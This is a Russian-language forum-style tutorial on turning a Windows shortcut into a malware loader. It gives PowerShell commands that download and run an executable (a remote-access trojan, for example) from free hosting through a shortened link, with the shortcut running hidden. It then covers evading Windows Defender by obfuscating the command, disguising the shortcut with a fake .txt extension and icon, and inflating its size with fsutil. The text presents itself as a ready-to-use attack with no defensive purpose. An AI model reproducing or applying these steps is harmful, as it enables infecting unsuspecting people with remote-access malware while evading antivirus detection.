всех приветствую в этой статье я вам расскажу как можно спрятать вирус в ярлыке, а точней сделать лоадер. для этого нам понадобиться любой бесплатный хостинг я буду использовать 000webhost.com, не реклама теперь у нас есть хостинг заливаем туда наш файлик exe, *******, ратник что угодно теперь создаем на хостинге файл txt с командой, для чего объясню пожее Invoke-WebRequest ссылка_на_файл -UseBasicParsing -OutFile TEMP.exe ; Start TEMP.exe Code Invoke-WebRequest ссылка_на_файл -UseBasicParsing -OutFile TEMP.exe ; Start TEMP.exe заходим на сократитель ссылок cuti.cc, не реклама пишем ссылку на файл с командой txt после чего создаем ярлык и в путь пишем C:\WINDOWS\system32\cmd.exe /k powershell -W Hidden powershell -command (Invoke-webrequest -URI "ваша сокращенная ссылка" -UseBasicParsing).Content Code C:\WINDOWS\system32\cmd.exe /k powershell -W Hidden powershell -command (Invoke-webrequest -URI "ваша сокращенная ссылка" -UseBasicParsing).Content все лоадер готов теперь к тому почему я не мог поместить сразу полную команду в ярлыке путь имеет ограничение на длину символов. чтобы Windows-Defender молчал можно заюзать скрипт обфускации повершелл https://github.com/danielbohannon/Invoke-Obfuscation, не реклама и обфусцировать команду которую мы пишем в путь, а точней -command (Invoke-webrequest -URI "ваша сокращенная ссылка" -UseBasicParsing).Content Code -command (Invoke-webrequest -URI "ваша сокращенная ссылка" -UseBasicParsing).Content псс чтобы файл запускался в свойствах ярылка сделайте рабочию папку %temp% а то дефол будет C:\WINDOWS\system32 и если просто запустить прав не будет на доступ к папке C:\WINDOWS\system32\ теперь можно ставить иконку и любое название файла, а так как у ярлыка не видно расширения можно добавить .txt и любое другое, так же разрер файла можно накачать любым пампером. так же чтобы накачать файлу вес вот команда в cmd fsutil file seteof (ваш ярлык.lnk) (вес в байтах) Code fsutil file seteof (ваш ярлык.lnk) (вес в байтах) надеюсь моя статья была кому-нибудь полезна.